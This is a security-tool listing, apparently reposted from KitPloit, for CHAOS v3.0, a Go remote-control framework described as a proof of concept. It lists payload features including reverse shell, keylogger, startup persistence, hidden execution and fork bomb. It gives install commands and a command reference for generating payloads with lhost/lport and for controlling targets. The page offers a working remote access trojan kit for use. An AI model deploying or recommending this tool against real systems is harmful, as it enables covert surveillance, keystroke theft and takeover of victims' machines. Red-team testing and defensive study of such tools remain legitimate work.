CHAOS Framework v3.0 - Generate Payloads And Control Remote Windows Systems

2019-04-04T14:34:24
ID KITPLOIT:4505071684627164819
Type kitploit
Reporter KitPloit
Modified 2019-04-04T14:34:24

Description

CHAOS is a PoC that allow generate payloads and control remote operating systems.

Features
Feature | Windows | Mac | Linux
---|---|---|---
Reverse Shell | X | X | X
Download File | X | X | X
Upload File | X | X | X
Screenshot | X | X | X
Keylogger | X | |
Persistence | X | |
Open URL | X | X | X
Get OS Info | X | X | X
Fork Bomb | X | X | X
Run Hidden | X | |

Tested On
Kali Linux - ROLLING EDITION

How to Install

# Install dependencies
$ sudo apt install golang git -y

# Get this repository
$ go get github.com/tiagorlampert/CHAOS

# Get external golang dependencies (ARE REQUIRED GET ALL DEPENDENCIES)
$ go get github.com/kbinani/screenshot
$ go get github.com/lxn/win
$ go get github.com/matishsiao/goInfo
$ go get golang.org/x/sys/windows

# Maybe you will see the message "package github.com/lxn/win: build constraints exclude all Go files".
# It's occurs because the libraries are to windows systems, but it necessary to build the payload.

# Go into the repository
$ cd ~/go/src/github.com/tiagorlampert/CHAOS

# Run
$ go run main.go

How to Use
Command | On HOST does...
---|---
generate | Generate a payload (e.g. generate lhost=192.168.0.100 lport=8080 fname=chaos --windows )
lhost= | Specify a ip for connection
lport= | Specify a port for connection
fname= | Specify a filename to output
--windows | Target Windows
--macos | Target Mac OS
--linux | Target Linux
listen | Listen for a new connection (e.g. listen lport=8080 )
serve | Serve files
exit | Quit this program
Command | On TARGET does...
---|---
download | File Download
upload | File Upload
screenshot | Take a Screenshot
keylogger_start | Start Keylogger session
keylogger_show | Show Keylogger session logs
persistence_enable | Install at Startup
persistence_disable | Remove from Startup
getos | Get OS name
lockscreen | Lock the OS screen
openurl | Open the URL informed
bomb | Run Fork Bomb
clear | Clear the Screen
back | Close connection but keep running on target
exit | Close connection and exit on target

Video

FAQ

>
Why does Keylogger capture all uppercase letters?
All the letters obtained using the keylogger are uppercase letters. It is a known issue, in case anyone knows how to fix the Keylogger function using golang, please contact me or open an issue.

>
Why are necessary get and install external libraries?
To implement the screenshot function i used a third-party library, you can check it in https://github.com/kbinani/screenshot and https://github.com/lxn/win . You must download and install it to generate the payload.

Contact
[email protected]

Download CHAOS